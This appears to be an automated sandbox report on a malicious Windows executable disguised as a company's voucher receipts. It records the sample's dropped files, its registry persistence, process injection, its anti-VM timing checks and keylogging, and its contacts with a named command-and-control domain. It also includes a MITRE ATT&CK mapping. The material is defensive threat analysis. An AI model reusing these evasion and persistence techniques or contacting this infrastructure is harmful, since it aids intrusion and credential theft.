            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeStatic file information: File size 1375376 > 1048576

Data Obfuscation

Source: Yara match | File source: 00000002.00000002.2648233506.0000000006091000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe | Code function: 2_2_00405EBE GetModuleHandleA,LoadLibraryA,GetProcAddress
Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe | Code function: 2_2_10002CE0 push eax; ret 2_2_10002D0E

Persistence and Installation Behavior

Source: Initial sample | Joe Sandbox AI: Detected suspicious elements in PE signature: Multiple highly suspicious indicators: 1) Self-signed certificate (issuer matches subject exactly), 2) Organization 'Familiaritet' is not a known legitimate company, 3) Email domain 'lokalplanstridig.Kal' is highly suspicious and not a valid TLD, 4) Certificate validation failed with untrusted root certificate, 5) Large time gap between compilation date (2013) and certificate dates (2024-2025) suggests possible certificate manipulation or code resigning, 6) Organization unit 'Marvelousness Yearbook' appears randomly generated or nonsensical, 7) While US-based certificate claims are generally lower risk, the combination with other factors suggests location spoofing. The overall pattern strongly indicates a malicious attempt to appear legitimate while using fake/invalid certificate details.
Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe | File created: \bina tegas sdn bhd voucher receipts.exe.bin.exe (4 times)
Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe | File created: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exe
Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe | File created: C:\Users\user\AppData\Local\Temp\nsaFB2F.tmp\System.dll
Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exe | File created: C:\Users\user\AppData\Local\Temp\nsf7576.tmp\System.dll
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Skruplers (4 times)
Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe | Process information set: NOOPENFILEERRORBOX (5 times)
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe | Process information set: NOOPENFILEERRORBOX (8 times)
Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exe | Process information set: NOOPENFILEERRORBOX (3 times)

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe | API/Special instruction interceptor: Address: 662D680
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe | API/Special instruction interceptor: Address: 4B5D680
Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe | RDTSC instruction interceptor: First address: 65EA5C3 second address: 65EA5C3 instructions: 0x00000000 rdtsc 0x00000002 test cx, bx 0x00000005 cmp ebx, ecx 0x00000007 jc 00007F80B48A3577h 0x00000009 inc ebp 0x0000000a inc ebx 0x0000000b rdtsc
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe | RDTSC instruction interceptor: First address: 4B1A5C3 second address: 4B1A5C3 instructions: 0x00000000 rdtsc 0x00000002 test cx, bx 0x00000005 cmp ebx, ecx 0x00000007 jc 00007F80B4732907h 0x00000009 inc ebp 0x0000000a inc ebx 0x0000000b rdtsc
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe | Window / User API: threadDelayed 3174
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe | Window / User API: threadDelayed 1265
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe | Window / User API: threadDelayed 4676
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe | Window / User API: foregroundWindowGot 1756
Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsaFB2F.tmp\System.dll
Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsf7576.tmp\System.dll
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe TID: 3956 | Thread sleep count: 3174 > 30
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe TID: 2156 | Thread sleep count: 1265 > 30
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe TID: 2156 | Thread sleep time: -3795000s >= -30000s
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe TID: 2156 | Thread sleep count: 4676 > 30
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe TID: 2156 | Thread sleep time: -14028000s >= -30000s
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe | Thread sleep count: Count: 3174 delay: -5
Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe | Code function: 2_2_00405470 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe | Code function: 2_2_00405E97 FindFirstFileA,FindClose
Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe | Code function: 2_2_0040264F FindFirstFileA
Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exe | Code function: 15_2_00405470 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exe | Code function: 15_2_00405E97 FindFirstFileA,FindClose
Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exe | Code function: 15_2_0040264F FindFirstFileA
Source: Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe, 00000002.00000002.2647476612.000000000066E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: hECVMWar&Prod_VMware_SATA_CX
Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007F48000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW ^
Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007FA0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe | API call chain: ExitProcess graph end node graph_2-3941
Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe | API call chain: ExitProcess graph end node graph_2-4100
Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exe | API call chain: ExitProcess graph end node graph_15-2831
Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exe | API call chain: ExitProcess graph end node graph_15-2990
Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe | Code function: 2_2_0040310B EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,LdrInitializeThunk,DeleteFileA,CopyFileA,LdrInitializeThunk,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe | Code function: 2_2_00405EBE GetModuleHandleA,LoadLibraryA,GetProcAddress

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe | Thread created: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe EIP: 4B1A47E
Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe | Memory written: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe base: 3000000
Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe | Process created: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe "C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe" (4 times)
Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007F85000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerG
Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007F85000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager`&
Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007F85000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerh
Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007F85000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manageru&T
Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007F85000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007F85000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerQ&p
Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007FA0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerInstallingode
Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007F85000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerA
Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007F85000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerGT
Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007F85000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerr&]
Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007F85000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager:&
Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007F85000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerr|
Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007F85000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager3&
Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007F85000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerU
Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007F85000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerG&F
Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007FA0000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 0000000E.00000003.2901823548.0000000007FAF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007F85000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager|
Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007FA0000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007F85000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 0000000E.00000003.2901823548.0000000007FAF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [Program Manager]
Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007F85000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerN&y
Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe | Code function: 2_2_00405BB5 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA

Stealing of Sensitive Information

Source: Yara match | File source: 0000000E.00000002.3740304162.0000000007FA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000003.2901823548.0000000007FAF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: IMCCPHR.exe PID: 6628, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\Atrulx\logs.dat, type: DROPPED

            Remote Access Functionality

            Source: Yara match, File source: 0000000E.00000002.3740304162.0000000007FA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000E.00000003.2901823548.0000000007FAF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: Process Memory Space: IMCCPHR.exe PID: 6628, type: MEMORYSTR
            Source: Yara match, File source: C:\Users\user\AppData\Roaming\Atrulx\logs.dat, type: DROPPED
            MITRE ATT&CK Matrix

            The matrix lists one technique per tactic and row. A number in parentheses is the report's count of matched signatures for that technique; techniques without a number are unmatched matrix placeholders.

            Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties
            Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet
            Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media
            Execution: Native API (1), Scheduled Task/Job, At, Cron, Launchd, Scheduled Task
            Persistence: Registry Run Keys / Startup Folder (1), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
            Privilege Escalation: Process Injection (212), Registry Run Keys / Startup Folder (1), DLL Side-Loading (1), Login Hook, Network Logon Script, RC Scripts
            Defense Evasion: Masquerading (2), Virtualization/Sandbox Evasion (2), Process Injection (212), Obfuscated Files or Information (1), DLL Side-Loading (1), Steganography
            Credential Access: Input Capture (11), LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials
            Discovery: Security Software Discovery (31), Virtualization/Sandbox Evasion (2), Process Discovery (1), Application Window Discovery (1), File and Directory Discovery (2), System Information Discovery (23)
            Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC
            Collection: Input Capture (11), Archive Collected Data (1), Clipboard Data (1), Input Capture, Keylogging, GUI Input Capture
            Command and Control: Encrypted Channel (11), Non-Standard Port (1), Ingress Tool Transfer (1), Non-Application Layer Protocol (2), Application Layer Protocol (13), Multiband Communication
            Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits
            Impact: System Shutdown/Reboot (1), Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            Behavior Graph

            Behavior Graph ID: 1637330
            Sample: Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe
            Start date: 13/03/2025
            Architecture: WINDOWS
            Score: 100

            Sample-level DNS/IP info: msi25.dynnamn.ru; www.dropbox.com; 4 other IPs or domains
            Sample-level signatures: Suricata IDS alerts for network traffic; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 7 other signatures

            Process: Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe (started; created registry values / files: 1 / 40)
              Dropped: C:\Users\user\AppData\Roaming\...\Udarter.exe (PE32); C:\Users\user\AppData\Local\...\System.dll (PE32)
              Signatures: Writes to foreign memory regions; Creates a thread in another existing process (thread injection)
              Started: IMCCPHR.exe (4 instances; first instance created registry values / files: 5 / 16)
                DNS/IP info: msi25.dynnamn.ru (103.47.146.161, 3219, 49757, AS45671-NET-AUWholesaleServicesProviderAU, Pakistan); edge-block-www-env.dropbox-dns.com (162.125.66.15, 443, 49756, DROPBOXUS, United States); 2 other IPs or domains
                Dropped: C:\Users\user\AppData\Roaming\...\logs.dat (data)
                Signatures: Installs a global keyboard hook; Tries to detect virtualization through RDTSC time measurements; Switches to a custom stack to bypass stack traces

            Process: Udarter.exe (started; created files: 22)
              Dropped: C:\Users\user\AppData\Local\...\System.dll (PE32)
              Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file
